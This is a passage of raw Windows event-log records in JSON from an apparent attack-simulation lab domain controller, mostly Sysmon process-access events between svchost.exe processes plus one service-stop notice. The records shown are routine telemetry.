(x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76869,"ProcessID":852,"ThreadID":936,"Channel":"System","Message":"The Tile Data model server service entered the stopped state.","param1":"Tile Data model server","param2":"stopped","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6976,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.039\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.039","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6977,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.039\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.039","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6978,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.039\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.039","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6979,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.039\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.039","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6980,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.039\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.039","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6981,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.039\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.039","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6982,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.039\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:40.039","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6983,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:40.039\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 